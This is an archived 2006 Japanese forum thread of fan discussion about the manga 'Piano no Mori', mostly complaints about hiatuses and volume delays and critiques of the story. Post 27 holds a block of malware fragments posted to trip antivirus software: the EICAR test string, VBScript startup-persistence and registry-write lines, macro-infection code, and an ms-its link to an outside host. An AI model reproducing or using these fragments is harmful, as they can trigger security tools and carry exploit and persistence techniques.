5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

一色まこと ピアノの森9

1 :名無しんぼ@お腹いっぱい:2006/11/08(水) 18:43:13 ID:OZXsaCLe0
一色まことのピアノの森、モーニングにてぼちぼち連載中。

前スレ
【最終章】一色まこと ピアノの森8【突入?】
http://comic6.2ch.net/test/read.cgi/comic/1146097806/

過去スレ
【ぼちぼち】一色まこと ピアノの森7【連載】
http://comic6.2ch.net/test/read.cgi/comic/1133451485/
【ソリスト賞】一色まこと ピアノの森6【M響GJ!】
http://comic6.2ch.net/test/read.cgi/comic/1126351325/
【愛おしい】一色まこと ピアノの森5【月光】
http://comic6.2ch.net/test/read.cgi/comic/1122434612/
【便所】一色まこと ピアノの森 4【姫】
http://comic6.2ch.net/test/read.cgi/comic/1119768052/
【女流】一色まこと ピアノの森 3【作家】
http://comic6.2ch.net/test/read.cgi/comic/1115888430/
一色まこと2 「ピアノの森」
http://comic6.2ch.net/test/read.cgi/comic/1099551294/
ピアノの森
http://comic6.2ch.net/test/read.cgi/comic/1065118884/
【登場人物紹介】
一ノ瀬海:主人公。私娼窟「森の端」で生まれた若き天才ピアニスト
雨宮修平:秀才ピアニスト。海の親友にしてライバル。現在海外で修業中。
阿字野壮介:事故で演奏家生命を絶たれた元天才ピアニスト。桐山音大教授。海の師匠。
丸山誉子:海のピアノを追い求めるピアニスト。ついに海と再会。あだなは「便所姫」
一ノ瀬玲子:海の母。娼婦。
マリア:謎の美人ピアニスト。その正体は?
佐賀武士:浪花音大学長代理。かつて海を排除したが今は・・・。
司馬高太郎:ハヤマ高等学院のピアノ教授。誉子のピアノを指導している。
雨宮洋一郎:修平の父。癒し系のピアノを弾く一流ピアニスト。
岸上冴:彫り物師。海の恋人。

2 :長谷部タイ子:2006/11/08(水) 19:03:22 ID:q2RfSz+A0
導尿カテーテル2げと

3 :名無しんぼ@お腹いっぱい:2006/11/08(水) 19:03:34 ID:lI6YlWkf0
2なら

4 :名無しんぼ@お腹いっぱい:2006/11/08(水) 23:41:05 ID:gK2RkZ/p0
>1
乙!


5 :名無しんぼ@お腹いっぱい:2006/11/09(木) 01:36:43 ID:QURKfAMx0
遺作乙。

6 :名無しんぼ@お腹いっぱい:2006/11/09(木) 02:32:53 ID:6wb//vdu0
連載終わった作品は懐漫板に立てるべきだと思うんだが…

7 :名無しんぼ@お腹いっぱい:2006/11/09(木) 08:22:46 ID:JiD0WJ+U0
アッパーズでの休載時にも、このスレは普通に継続してたので却下。

8 :名無しんぼ@お腹いっぱい:2006/11/09(木) 10:06:10 ID:JiD0WJ+U0
>6
よく考えたら、少女マンガ板に「ガラスの仮面」スレがしっかり生きてるやんか。
あれなんぞ、マジで連載終わってからどのくらいたつと・・・。
(2004年末に出た最新刊は全書き下ろし)

さすがに、あそこまで行ってほしくはないが。

9 :名無しんぼ@お腹いっぱい:2006/11/09(木) 11:15:25 ID:4SMEYmhX0
カムイ伝も2000年から休載してるけどまだこの板にスレがある。

10 :名無しんぼ@お腹いっぱい:2006/11/09(木) 11:51:06 ID:KhOfHHEs0
昔ながらの一色読みならとか言ってるヤツがいるけど、花田やハッスルの連載時は
週刊誌読みでもこれほどのストレスはなかったぞ。

どうせアッパーズ時代のピアノあたりから入ったくせに何を言うやらだ。

11 :名無しんぼ@お腹いっぱい:2006/11/09(木) 12:34:28 ID:JiD0WJ+U0
年をとるほどに堪え性がなくなるというタイプも珍しいな。

12 :名無しんぼ@お腹いっぱい:2006/11/09(木) 13:39:13 ID:KhOfHHEs0
>>11
おまえか?w
年取るとな、死ぬまでに完結して欲しい作品てのが増えるんだよ。
ブラよろとかガラかめとか夢枕獏の小説とかな。

13 :名無しんぼ@お腹いっぱい:2006/11/09(木) 13:59:27 ID:QURKfAMx0
田中芳樹とかは続きを書かずに新シリーズばっか立ち上げてたから見捨てました。




14 :名無しんぼ@お腹いっぱい:2006/11/09(木) 15:20:10 ID:JiD0WJ+U0
>>12
どういう意味で「おまえか?」なのかよくわからんが、
俺は「出直しといで!」の頃から一色まこと作品につきあっている。

で。最近はもう達観しているw
のんびり待つわ。

誰しもいつ死ぬかなんてわからねえんだから、ンなことあせっても
しかたないでしょ。
俺はポジティブに「完結するまではくたばってやらねえ」と待つ。

15 :名無しんぼ@お腹いっぱい:2006/11/09(木) 15:44:20 ID:xPXfaysU0
万一瀕死の重傷を負ったとき、「ピアノの森を最後まで読まずに死ねるか!」と
気力で生き延びるための支えになったり…することもある、かも。

16 :名無しんぼ@お腹いっぱい:2006/11/09(木) 15:47:47 ID:QURKfAMx0
作者がくたばっちまったらそのポジティブ思考も意味がネェ。

17 :名無しんぼ@お腹いっぱい:2006/11/09(木) 18:15:37 ID:JiD0WJ+U0
前スレ1000とかを見ると、「芸がねえなあ」と思う。

余計なことだと思うがこのご時勢、
決まりきったネタしか作れない硬直した頭では生き抜いて行けんぞ。

18 :名無しんぼ@お腹いっぱい:2006/11/09(木) 19:15:10 ID:9SlHxngS0
>>17
とりあえずあなたがよほど暇なのだろうということはよくわかった。

19 :名無しんぼ@お腹いっぱい:2006/11/09(木) 19:58:05 ID:4nToAVqI0
>>17みたいに必死で反応するバカが居るからこそ、「ああいうの書くんだろうなあ」と思う。


20 :名無しんぼ@お腹いっぱい:2006/11/09(木) 20:13:40 ID:JiD0WJ+U0
さて、暇人だと言われたり必死だと言われたり。
ベクトルまるで逆だなw

21 :名無しんぼ@お腹いっぱい:2006/11/09(木) 20:17:04 ID:g4HP1eeyP
ID:JiD0WJ+U0=必死な暇人ってことじゃん
「ベクトルまるで逆だなw」とか言ってることが間抜け杉w



22 :名無しんぼ@お腹いっぱい:2006/11/09(木) 20:18:21 ID:SFDV+x780
こらこら、あまり頭の弱い子をイジメちゃダメだって
ID:JiD0WJ+U0も日付変わるまでは大人しくしてなさい

23 :名無しんぼ@お腹いっぱい:2006/11/10(金) 02:30:56 ID:KPP5xuPqO
ケンカはやめて淫売村の話しでもしようよ!

24 :名無しんぼ@お腹いっぱい:2006/11/10(金) 10:37:55 ID:gP1cP9aJ0
断る!

25 :名無しんぼ@お腹いっぱい:2006/11/10(金) 10:48:06 ID:F2/EUS9v0
コンクールのラスボスはアリサ

26 :名無しんぼ@お腹いっぱい:2006/11/11(土) 14:57:12 ID:aHflfz7d0
観月?

27 :<body onload=window()>:2006/11/11(土) 16:39:33 ID:wr4+U8Jc0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

28 :名無しんぼ@お腹いっぱい:2006/11/13(月) 02:19:40 ID:+Awqh/wI0
ノートン切らないとこのスレ見れなくなっちゃった。どうすればいいか対策を教えてください

29 :名無しんぼ@お腹いっぱい:2006/11/13(月) 06:25:42 ID:5Hzn3iWZ0
最近、27をよく見かけるね。

オレはバカだから意味はわからんけど。

誰かエロい人教えてください。


30 :名無しんぼ@お腹いっぱい:2006/11/13(月) 06:26:44 ID:tx46zyYS0
気にしなければいいんだよ

31 :名無しんぼ@お腹いっぱい:2006/11/13(月) 07:10:58 ID:kKkNbcud0
>>28
専ブラ使ってなかったら専ブラ導入してどっか適当にな文字列をNG指定してやる。

32 :名無しんぼ@お腹いっぱい:2006/11/13(月) 09:14:09 ID:UyBBVjc0O
しかし今まこと氏は何をやっているのかな?

33 :名無しんぼ@お腹いっぱい:2006/11/13(月) 09:33:59 ID:tx46zyYS0
大掃除

34 :名無しんぼ@お腹いっぱい:2006/11/13(月) 09:52:54 ID:64FJj9Q10
>>28
「ノートントラップ」でぐぐれ

35 :名無しんぼ@お腹いっぱい:2006/11/13(月) 17:07:29 ID:+Awqh/wI0
>>34
ありがとう。対応できました。

36 :名無しんぼ@お腹いっぱい:2006/11/15(水) 14:54:43 ID:tqXVlEEz0
若い頃の輝きをなくしたブーニン
第一部の輝きをなくしたピアノの森・・・

37 :名無しんぼ@お腹いっぱい:2006/11/16(木) 15:07:45 ID:/dzP7l2f0
未来がみえた。


【訃報】 漫画家 石川賢死去
http://news20.2ch.net/test/read.cgi/news/1163613185/

38 :名無しんぼ@お腹いっぱい:2006/11/17(金) 01:34:33 ID:IqHH9Ij/0
今週も休みか

39 :名無しんぼ@お腹いっぱい:2006/11/17(金) 14:57:07 ID:3VCYw6pI0
>>38
休載はデフォです。
掲載されるのはイレギュラーです。

40 :名無しんぼ@お腹いっぱい:2006/11/19(日) 16:32:13 ID:o0IlYua30
ショパンのバラード2番弾いてくれないかなー

41 :名無しんぼ@お腹いっぱい:2006/11/21(火) 08:48:19 ID:WZJU+8i10
もう終わりでいいよ

42 :名無しんぼ@お腹いっぱい:2006/11/21(火) 23:19:36 ID:hylpJ0Yn0
13巻、また発売延期かよ・・・

43 :名無しんぼ@お腹いっぱい:2006/11/22(水) 08:20:26 ID:KCsS/nzSP
モーニング52号 P98に広告掲載
12月7日発売号から 連 載 再 開

44 :名無しんぼ@お腹いっぱい:2006/11/22(水) 08:39:18 ID:XxcttfqS0
>>43
問題は何回連載が続くかだろうな。
つうか連載再開って書くなら、きちんと休載開始も書けよバカ。
何が「今週のピアノの森はお休みします、申し訳ありません」だ。

45 :名無しんぼ@お腹いっぱい:2006/11/22(水) 12:34:40 ID:y+X2qSa60
花田少年史の人形届いた。
当選者2000名だったから
全プレに近いんじゃないかと思ったら案の定

46 :名無しんぼ@お腹いっぱい:2006/11/22(水) 13:57:22 ID:opEveS8m0
再開きたーヽ(´A`)ノ

47 :名無しんぼ@お腹いっぱい:2006/11/23(木) 00:34:14 ID:/NF7nK5A0
連載するより書き溜めておいて月1くらいでだらだら放出したほうがいいかもな

48 :名無しんぼ@お腹いっぱい:2006/11/23(木) 01:13:32 ID:LD93dD/e0
描いてくれるならチェーザレくらいのペースでもいいやもう

49 :名無しんぼ@お腹いっぱい:2006/11/23(木) 04:19:04 ID:RbQ/0ZED0
カイに
逢いたい……。

50 :名無しんぼ@お腹いっぱい:2006/11/23(木) 13:17:06 ID:ziakltOB0
いきなり冴ちゃんから始まるに10ズウォチ

51 :名無しんぼ@お腹いっぱい:2006/11/23(木) 15:29:49 ID:BlCB2Ak/O
パンウェイ様に逢いたいいぃぃぃぃぃぃぃぃぃぃぃ!!!!!!!!

52 :名無しんぼ@お腹いっぱい:2006/11/23(木) 16:53:45 ID:QJ2V/BIvO
13巻待ちなんだが延期したの?いつ発売?

53 :名無しんぼ@お腹いっぱい:2006/11/23(木) 17:01:03 ID:Y+IBdSMR0
>>52
作者の気が向いたとき

54 :名無しんぼ@お腹いっぱい:2006/11/23(木) 17:20:18 ID:QJ2V/BIvO
>>53
本屋に聞いたら、延期だなんて聞いてないけど、
講談社ではよくあることだって言われたよ。
それで済まされるのがある意味すごい

55 :名無しんぼ@お腹いっぱい:2006/11/23(木) 23:48:15 ID:RbQ/0ZED0
次に載る話が13巻の末尾になるんじゃないの?

56 :名無しんぼ@お腹いっぱい:2006/11/24(金) 00:50:47 ID:Ddqga6Gj0
「今週のピアノの森はお休みします」じゃなく、
「今週のピアノ“も”森はお休みします」と書け。

ともあれ連載再開はめでたい。最低1ヶ月は続けてほしい。

57 :名無しんぼ@お腹いっぱい:2006/11/24(金) 02:26:05 ID:1YPJReXI0
今度は何週続くか賭けない?俺は10週と見た

58 :名無しんぼ@お腹いっぱい:2006/11/24(金) 08:56:22 ID:MyH/TXi/0
延期した単行本発売のために、無理矢理1回分だけ出すってオチ。

59 :名無しんぼ@お腹いっぱい:2006/11/24(金) 09:37:15 ID:KcnqiZbq0
>>58
その発想はなかたわ

60 :名無しんぼ@お腹いっぱい:2006/11/24(金) 09:50:28 ID:yFp/Vm2o0
それなら単行本発売直前に表紙&巻頭でやって欲しかったな。

61 :名無しんぼ@お腹いっぱい:2006/11/24(金) 18:42:30 ID:uIdudeLX0
>>58
ホムンクルスが一時的に2、3週再開したみたいにか

62 :名無しんぼ@お腹いっぱい:2006/11/25(土) 21:11:54 ID:rWJbBrd40
13巻は11月22日から12月22日に延期

63 :名無しんぼ@お腹いっぱい:2006/11/25(土) 21:21:31 ID:LU+cNgYb0
さらに一色まこと先生連載再開に伴い
1月22日に延期される予定です。
乞うご期待ください☆

64 :名無しんぼ@お腹いっぱい:2006/11/25(土) 22:32:25 ID:oG325kXQ0
>>63
乞うご期待ください

意味不明です

65 :名無しんぼ@お腹いっぱい:2006/11/25(土) 23:34:49 ID:1Yn0q9kU0
>>63
ほら、やるよ。
つ【乞うご期待】

66 :名無しんぼ@お腹いっぱい:2006/11/26(日) 17:53:40 ID:cYrPV65I0
********【しばらくお待ち下さい】********

67 :名無しんぼ@お腹いっぱい:2006/11/26(日) 22:25:35 ID:0cUH7te1O
単行本 延期かよ
本屋を隅々まで探してしまったorz
このスレの人たち教えてくれてありがトン

68 :名無しんぼ@お腹いっぱい:2006/11/26(日) 22:41:47 ID:cUThc7W10
どーいたしまして

69 :名無しんぼ@お腹いっぱい:2006/11/27(月) 00:18:09 ID:iE/vffjK0
1月に延期ってマジで?

70 :名無しんぼ@お腹いっぱい:2006/11/27(月) 18:30:56 ID:sIkX6oL70
 

71 :名無しんぼ@お腹いっぱい:2006/11/27(月) 23:48:52 ID:n5pBvTkhO
>>57
10週も続かなそう

72 :名無しんぼ@お腹いっぱい:2006/11/28(火) 00:19:03 ID:Qqhv5iAZ0
4週

73 :名無しんぼ@お腹いっぱい:2006/11/28(火) 08:29:23 ID:BxwWd2WM0
懐かし漫画に移動した方がいいようなが気がしてきた。

74 :名無しんぼ@お腹いっぱい:2006/11/28(火) 12:34:14 ID:qg4k7sv/0
>>45
いいなー、本当にあたるんだ
ところで前にあったピアノの森のポスターって当選した人いるの?
あれほしかった

75 :名無しんぼ@お腹いっぱい:2006/11/30(木) 07:09:43 ID:wW3D8Y3t0
大変だ!
来週は掲載されるらしいぞ!

76 :名無しんぼ@お腹いっぱい:2006/11/30(木) 09:56:28 ID:6SVZ3/hm0
3週分の原稿しかなくて、それを隔週で連載と見た。

77 :名無しんぼ@お腹いっぱい:2006/11/30(木) 13:29:32 ID:Rl1vyYjO0
次週カイはショパコンに優勝。雨宮と和解。
一方阿字野の手の手術成功。
最大のライバルとしてカイの前に立ちはだかるのであった。


で、エンド。

78 :名無しんぼ@お腹いっぱい:2006/11/30(木) 18:06:11 ID:Fe5TIWEK0
あれだけ大々的に見開き使って連載再開予告するくらいだから
前回復活したときくらいは続くでしょ

79 :名無しんぼ@お腹いっぱい:2006/11/30(木) 21:30:18 ID:OIW4/ATz0
カイ優勝

でも世界にはもっとすげーやつがいる!俺達の演奏はまだまだつづくぜ!って旅に出る

飛行機が空を飛ぶ絵で終了

80 :名無しんぼ@お腹いっぱい:2006/11/30(木) 22:13:23 ID:9wPP049F0
本当にその展開になったらコミックス全部捨てる

81 :名無しんぼ@お腹いっぱい:2006/11/30(木) 22:24:12 ID:3qwHAhTD0
もうちょっとだけ続くんじゃ

82 :名無しんぼ@お腹いっぱい:2006/11/30(木) 23:14:30 ID:SldhhWCt0
>>79
ただで古本屋へ置いて行く。

83 :名無しんぼ@お腹いっぱい:2006/11/30(木) 23:54:29 ID:fhpAYiC10
というか「長期休載」の告知を出してすらいなかったくせに
「連載再開」とか堂々と言ってるのが一番不愉快。

84 :名無しんぼ@お腹いっぱい:2006/11/30(木) 23:58:18 ID:MX95fJAD0
仁Dみたいにピアノを弾くシーンで3週間。

85 :名無しんぼ@お腹いっぱい:2006/12/02(土) 10:09:23 ID:vknlcoDQO
パンウェイの生い立ちの逸話とかやるはずと思うから絶対長く続くよ

86 :名無しんぼ@お腹いっぱい:2006/12/03(日) 18:01:46 ID:EQPd+/7X0
少年期は惹きこまれる面白さがあるけど
青年期に入ったら下降線状態のような
他で青年期描いてる作品ある?

87 :名無しんぼ@お腹いっぱい:2006/12/03(日) 18:17:13 ID:xH7bWV8r0
つドラゴンボール

88 :名無しんぼ@お腹いっぱい:2006/12/03(日) 19:35:27 ID:0lKNguT90
ジョジョ第一部

89 :名無しんぼ@お腹いっぱい:2006/12/03(日) 20:01:26 ID:0zHd7rMr0
>>86
ていうか後半になって面白くなる作品自体少ないわな。


90 :名無しんぼ@お腹いっぱい:2006/12/04(月) 09:43:01 ID:rZaqIoYL0
>>89
つキーチ!

91 :名無しんぼ@お腹いっぱい:2006/12/06(水) 18:32:58 ID:yWhtvfE80
俺はキーチは売春の子のために国会前に殴り込む時よりも
親が殺されてから山で発見される間でのが面白い

92 :名無しんぼ@お腹いっぱい:2006/12/06(水) 22:28:49 ID:033pnIJSO
いよいよだねー
1時間後には近くのコンビニにモーニングが並ぶよ

93 :名無しんぼ@お腹いっぱい:2006/12/07(木) 07:43:30 ID:lvdV1umcO
表紙かっこいいな

94 :名無しんぼ@お腹いっぱい:2006/12/07(木) 08:28:28 ID:SxAhaIuUO
》84
仁Dなら三週間どころか三ヵ月。

95 :名無しんぼ@お腹いっぱい:2006/12/07(木) 08:59:40 ID:O/PCOXFW0
なんつーか、本編をどう進めたらいいのか分かんなくなって、
番外編でお茶を濁した感じだな。

これだと次号から休載を再開しても違和感ないし。

96 :名無しんぼ@お腹いっぱい:2006/12/07(木) 09:19:20 ID:8sLJfm6T0
何で海はコンクールに出るの?

このまま店で弾いてたほうが幸せそうジャン
海のピアノで森の端が変わるかもよ

97 :名無しんぼ@お腹いっぱい:2006/12/07(木) 11:14:25 ID:/TGn1fF3O
>>95-96
同意

98 :名無しんぼ@お腹いっぱい:2006/12/07(木) 13:58:24 ID:NcvTXGF/0
>>96-97
不同意

99 :名無しんぼ@お腹いっぱい:2006/12/07(木) 17:32:11 ID:UdCUeX7h0
またこのパターンかという感じだったな今週は。

100 :名無しんぼ@お腹いっぱい:2006/12/07(木) 19:42:20 ID:WbpC5ORr0
前回どう終わったのかなんてカケラも覚えてないので、この再開のしかたでいいです。

101 :名無しんぼ@お腹いっぱい:2006/12/07(木) 20:27:29 ID:RcKy55/R0
モーニング買うのやめますた。休載がむかつくので。

102 :名無しんぼ@お腹いっぱい:2006/12/07(木) 21:37:58 ID:k0D2zicq0
いちいち言わないでいいよ

103 :名無しんぼ@お腹いっぱい:2006/12/07(木) 23:05:13 ID:/TGn1fF3O
言わせてやれよ

104 :名無しんぼ@お腹いっぱい:2006/12/07(木) 23:05:29 ID:EI47bqJj0
せっかく再開したのにつまらん

コンクールの最中だというのにカイは余裕こきすぎだろ

105 :名無しんぼ@お腹いっぱい:2006/12/08(金) 01:36:51 ID:2wZcSu310
再開したはいいが話がさっぱりわからん、というか前の展開を覚えてない

106 :名無しんぼ@お腹いっぱい:2006/12/08(金) 07:52:38 ID:NRJuBUC50
小学生編がいちばんおもしろかったな

107 :名無しんぼ@お腹いっぱい:2006/12/08(金) 08:50:51 ID:rqHWU8/Y0
どうみても休載への伏線。
あと2週のうちに休載再開。

108 :名無しんぼ@お腹いっぱい:2006/12/08(金) 12:27:17 ID:fsQMOLKk0
連載再開したのにこの盛り下がりっぷりはすごい

109 :名無しんぼ@お腹いっぱい:2006/12/08(金) 13:27:38 ID:64wj45Bp0
モーニング
表紙いいね、保存版にするよ

110 :名無しんぼ@お腹いっぱい:2006/12/08(金) 13:35:11 ID:rqHWU8/Y0
オマエら、内容に触れてください

111 :名無しんぼ@お腹いっぱい:2006/12/08(金) 14:35:33 ID:gZuq7Y6J0
海が一晩で全部やったんだよ

112 :名無しんぼ@お腹いっぱい:2006/12/08(金) 15:03:23 ID:Tcpainhb0
>>109
13巻の広告を見ると
今回の表紙はそのまま13巻の表紙になるっぽい
つーか13巻の表紙をモーニングの表紙に持って来ただけ?

113 :名無しんぼ@お腹いっぱい:2006/12/08(金) 15:04:35 ID:oImV5bIH0
この作者に音楽の世界を描くのはムリだったんだよ。

114 :名無しんぼ@お腹いっぱい:2006/12/08(金) 15:14:23 ID:NRJuBUC50
音が出ないほど状態の悪いピアノって
調律だけじゃなくて部品を取り替えたりしないといけないから
一日じゃ直らないだろ

カイをスーパーマンにし過ぎじゃないか

115 :名無しんぼ@お腹いっぱい:2006/12/08(金) 17:14:21 ID:9sYrkmUi0
>>114
>>カイをスーパーマンにし過ぎじゃないか

そうだよなあ
なんだか作者が本気でカイに恋してしまってるキモイ空気を感じてしまう

116 :名無しんぼ@お腹いっぱい:2006/12/08(金) 17:23:25 ID:nb4t0qt/0
>>114
上にゴミがあんだけ乗って、弦に触れてたら音しないがな。

117 :名無しんぼ@お腹いっぱい:2006/12/08(金) 18:49:11 ID:AMChVJbp0
数年間弦にゴミ積んで放置じゃ、どっちにしろ一日じゃ直らないよ
部品交換もあるし、弦もゆるみすぎだから数回にわけて調律しないとだめだろ
まあ森の中の雨ざらしのピアノを子供が調律しつつ絶対音感を身に付ける漫画に
そんなことを言っても始まらないが・・

118 :名無しんぼ@お腹いっぱい:2006/12/08(金) 19:11:03 ID:bnnX8PxTO
カイ、人間できすぎだ
昔のカイみたいに、戸惑って涙目になったり腹立てたりしながらも、
周りを強引に丸め込み、自分も成長していく
みたいなほうがいいと思うんだがなぁ

119 :名無しんぼ@お腹いっぱい:2006/12/08(金) 19:35:39 ID:8Is1gB+z0
>>118
完全に同意

120 :名無しんぼ@お腹いっぱい:2006/12/08(金) 19:52:18 ID:R82awrZ+0
あー、それは確かになー。

121 :名無しんぼ@お腹いっぱい:2006/12/08(金) 22:07:06 ID:C3JNaN130
>>115
あー、なんか分かる
腐女子が理想の少年を描いてます、って感じ

まだまだ好きな漫画だけに、完璧超人ぶりを見せられるのはちょっと萎えるね

122 :名無しんぼ@お腹いっぱい:2006/12/08(金) 22:16:57 ID:Z5Mb5U1J0
映像化なるんだって

123 :名無しんぼ@お腹いっぱい:2006/12/09(土) 10:13:39 ID:j84E/8fN0
アニメじゃなくてドラマの方がこれは見栄えしそうだなぁ
ただカイをこなせる子役がいるかどうかか

124 :名無しんぼ@お腹いっぱい:2006/12/09(土) 11:38:37 ID:CfVuvhUz0
モーニングで連載再開してから
脚本家がちーむでいるんでしょう。

今回の開始も、今までコミックス派の方も、13巻買う前から
13巻の内容を知らないし、漫画なんてかなりの金額動くし
出版社は作者、作家のおかげで給料もらえてる人たちで
作品に貢献はできないけど、かなりのミーティングなどやってると思います

ただ、少年時代のような純粋なおはなしでなく、映画アニメ化、
テレビドラマ化など2年先のスケジュールは芸能界はうまってるそうだから
かなり計算されてると思うよ。漫画なんだからスーパーマンでいいよ
こどものカイがおもいピアノで練習してたこと自体がエピソードがおかしいんだしさ

今回の再開は素直にうれしいです

125 :名無しんぼ@お腹いっぱい:2006/12/09(土) 12:43:57 ID:put6ug5uO
腐女子乙

126 :名無しんぼ@お腹いっぱい:2006/12/09(土) 12:46:25 ID:gZXvz5H90
つまらん時はつまらんと言った方が作者のためだ。モーニングの編集は無能か?作家に媚売るだけしかできんのか?

127 :名無しんぼ@お腹いっぱい:2006/12/09(土) 12:55:37 ID:CfVuvhUz0
>>125
まぁ、2ちゃんで作品をボロクソ言う人と
ただ、こういう125みたいなやつに批判されるほど
一般人受けするんだよな

2ちゃんの語ってるやつに浮けいられたらおわりだりょ

128 :名無しんぼ@お腹いっぱい:2006/12/09(土) 13:31:58 ID:NaA/BIVQ0
小学生時代編は2ちゃんでも普通に評判よかったわけだが

129 :名無しんぼ@お腹いっぱい:2006/12/09(土) 13:43:25 ID:nxxV/Wsy0
モーニングで始まってからも、誉子がカイと再会するあたりまではおもしろかったと思う。
佐賀先生もいいキャラだし。
ショパコン編になってから、つまんなくなった。
新キャラは次々に出てくるけど、とれも設定だけの存在で、顔がよく見えない感じ。
露骨に休載ばっかりになるし、やっぱり迷走してんじゃないの?


130 :名無しんぼ@お腹いっぱい:2006/12/09(土) 14:53:53 ID:put6ug5uO
必死さは伝わるが、日本語がメチャクチャ。

131 :名無しんぼ@お腹いっぱい:2006/12/09(土) 15:59:27 ID:e2RdG9Ih0
反日中国人パンウェイが登場してからおかしくなった

132 :名無しんぼ@お腹いっぱい:2006/12/09(土) 16:16:47 ID:vGUJdwGt0
>>129
>とれも設定だけの存在で、顔がよく見えない感じ。

同意。
というか、どんなのが出てきたかもう忘れかけてる・・・

133 :名無しんぼ@お腹いっぱい:2006/12/09(土) 18:13:10 ID:rKMsQVqZ0
まあ出てきたばっかりだから仕方がないという面もある
パンウェイあたりはこれから掘り下げられていくだろうから期待したい

134 :名無しんぼ@お腹いっぱい:2006/12/09(土) 21:14:11 ID:ITD927lV0
この作者は少年・少女期以外はストーリーが練られない病かもしれない

135 :名無しんぼ@お腹いっぱい:2006/12/09(土) 23:10:51 ID:PmuDylvO0
>>129
便所姫がカイと再開するまではよかったよね。
カイ以外のキャラ視点で描いたほうがおもしろい。

136 :名無しんぼ@お腹いっぱい:2006/12/10(日) 02:46:24 ID:Pwo8RadFO
彫り師がでてきてつまらなくなったよな?

137 :名無しんぼ@お腹いっぱい:2006/12/10(日) 10:57:11 ID:pSNRPXqi0
まあ同意

138 :名無しんぼ@お腹いっぱい:2006/12/10(日) 19:11:04 ID:dZhIwXeaO
掘り師と分かれて便所姫にしとけ
とおもた
便所姫の方がかわいい

139 :名無しんぼ@お腹いっぱい:2006/12/10(日) 20:12:01 ID:O7dap59E0
彫り師とパンウェイが二度の長期休載の原因


140 :名無しんぼ@お腹いっぱい:2006/12/10(日) 21:14:20 ID:J8D7cMZX0
13巻が12月12日に発売

141 :名無しんぼ@お腹いっぱい:2006/12/10(日) 22:38:33 ID:iRam51hb0
12月22日でしょ?
http://7andy.yahoo.co.jp/books/detail?accd=R0224003

142 :名無しんぼ@お腹いっぱい:2006/12/10(日) 22:39:57 ID:AfaJ65Cm0
さすがに今回は表紙の絵もすでに書いたことだし
延期はしないだろうな。

143 :名無しんぼ@お腹いっぱい:2006/12/11(月) 01:21:06 ID:EU3pgFLL0
便所姫はどうせ雨宮とくっつくんだろ。そうなんだろ。

144 :名無しんぼ@お腹いっぱい:2006/12/11(月) 01:21:21 ID:UmGxOFLg0
休載の理由はいろいろ考え過ぎて描けなくなるからなのかな・・・
それとも体調不良とか?
「出直しといで!」もたしか3年ぐらい休載したように思うけど、
休載前のところでちゃんと話が一段落してるし、
内容的にも特に煮詰まっている感じではなかったし。


145 :名無しんぼ@お腹いっぱい:2006/12/11(月) 12:02:55 ID:GqjMuw5M0
休載は映画を描いてたからじゃないのか?

146 :名無しんぼ@お腹いっぱい:2006/12/11(月) 22:32:27 ID:60ISEN5+0
今回のと移動連載1回目のモーニングは捨てられない

147 :名無しんぼ@お腹いっぱい:2006/12/12(火) 14:03:21 ID:yDWYIH1/0
>>144
気分屋さんだから。

148 :名無しんぼ@お腹いっぱい:2006/12/12(火) 20:57:30 ID:lvFE0bfXO
>>146
移動後連載開始からもう1年たっちゃったんですね…シミジミ

149 :名無しんぼ@お腹いっぱい:2006/12/14(木) 10:20:58 ID:JyDecmeF0
今週のはラスボス=阿字野フラグかねえ

150 :名無しんぼ@お腹いっぱい:2006/12/15(金) 02:14:46 ID:u47fLR850
一瞬で読み終わってしまった
コマでかい・・

151 :名無しんぼ@お腹いっぱい:2006/12/15(金) 03:53:29 ID:hJUeXS9zO
パンウェイ様が出てきたわ

152 :名無しんぼ@お腹いっぱい:2006/12/15(金) 09:27:01 ID:F7mcfbQ90
内容薄すぎワロタ
休載してないだけありがたいと思わなきゃならんのか

153 :名無しんぼ@お腹いっぱい:2006/12/15(金) 10:07:25 ID:mrHM9l4d0
内容がないよう

154 :名無しんぼ@お腹いっぱい:2006/12/15(金) 11:43:34 ID:1H+V36A70
パンウェイは阿字野の隠し子

155 :名無しんぼ@お腹いっぱい:2006/12/15(金) 18:59:16 ID:hJUeXS9zO
顔がソックリ!

156 :名無しんぼ@お腹いっぱい:2006/12/15(金) 23:27:17 ID:ORyfAEQa0
hontoda

157 :名無しんぼ@お腹いっぱい:2006/12/16(土) 10:33:33 ID:mlaRzSlz0
後付設定であんなライバルを無理やり出すぐらいなら、雨宮との関係をしっかりじっくり描いて欲しいものだがなあ

158 :名無しんぼ@お腹いっぱい:2006/12/16(土) 13:05:10 ID:8+UXE34v0
雨宮はたいしたことないよ

159 :名無しんぼ@お腹いっぱい:2006/12/16(土) 13:44:34 ID:piQfbvwN0
雨宮はシロアリ

160 :名無しんぼ@お腹いっぱい:2006/12/16(土) 17:51:52 ID:5wqmwR3T0
長期連載したら、もうかるから
いろいろ脇役をだして、話をのばしたい
ドラゴンボール商法を、作品を理解できない
編集者がピアノのもりを、レイプしてるんじゃないの?

161 :名無しんぼ@お腹いっぱい:2006/12/16(土) 21:43:21 ID:66BrnV8f0
コミック(13巻)発売いつ?

